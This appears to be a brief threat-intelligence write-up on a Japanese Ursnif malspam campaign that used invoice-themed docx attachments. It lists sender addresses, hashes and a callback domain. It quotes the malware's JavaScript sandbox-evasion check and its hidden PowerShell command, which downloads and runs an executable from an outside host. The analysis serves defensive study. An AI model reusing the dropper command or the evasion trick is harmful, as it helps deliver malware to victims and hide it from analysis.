Quick Analysis of Japanese Ursnif Malspam Campaign

Malware Delivery Method

docx attachment in email

Execution process

attached docx opened -> embedded JavaScript executes -> powershell runs the script and communicates with internet -> downloads payload over HTTPS

Example:

Document sent as an attachment in the following email:

Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?=
From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <[email protected]>
To: <[email protected]>
Original attachment name: 原価請求書です277253.docx ("copy of Invoice" when translated)
MD5 hash: 85d09006634ab5f2138ac927997accda

Below are the unique sender email addresses observed in the Ursnif campaign which are sending the malicious Documents as email attachments:

[email protected]
[email protected]
[email protected]

And below are the spoofed addresses:

[email protected]
[email protected]
[email protected]

Embedded JavaScript in the docx performs the following tasks:

  • Detects Sleep Short Circuiting by checking the time difference between time-stamps before and after Sleep function is invoked.

piUCkfeTbuHWBQdaRl=”getS”+”ec”+”onds”;
TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();
WScript.Sleep(1000);
qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();

  • If Sleep Short Circuiting is not detected then JavaScript will execute Powershell to download the malicious payload over HTTPS as shown below:

lhzYcTRDtUorLVmdP.ShellExecute(“cmd.eXE”, “/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(‘https://aedwards.co/wp-includes/IXR/get.php?jgTbz’,’%appdata%xJr23.eXe’); sTarT-PROcess ‘%appdAta%xJr23.exe'”, “”, “open”, 0);

 

MD5 hash of the downloaded payload:

c0b7897f69f0a68297969c709cac576d

Downloaded payload will perform the following Network Callback post execution:

antispam.city/images/Ncd0ce3MW_2Br1/2xSMfrx83BhD9VwVpJlrz/Vcj4Y3fgOgnnRFQY/b5MMsaAEnTYFOQb/9smbf8JBZRu4uT2DPA/m3IUcDt7p/eRM513X067tKgbFbFUAP/CgywchBtV2v2M3vHdCF/Pye9qtR5e88uvj4d5msIyY/XHeVYOb9Z5pcC/GutfKuT3/w_2Bd1EzlOjZGmrVBuR7_2F/waO8u_2BBp/YC_2FNg9W/K92jQnG.jpeg

Interesting callback domain name:

antispam.city (how ironic)
Whois info shows that this domain was recently registered on 14th August 2017.

 

Ref:

https://www.virustotal.com/#/file/f05f940d70b4a90908e3f0517cf581ed9d83264548577393464f781f24882cd5/detection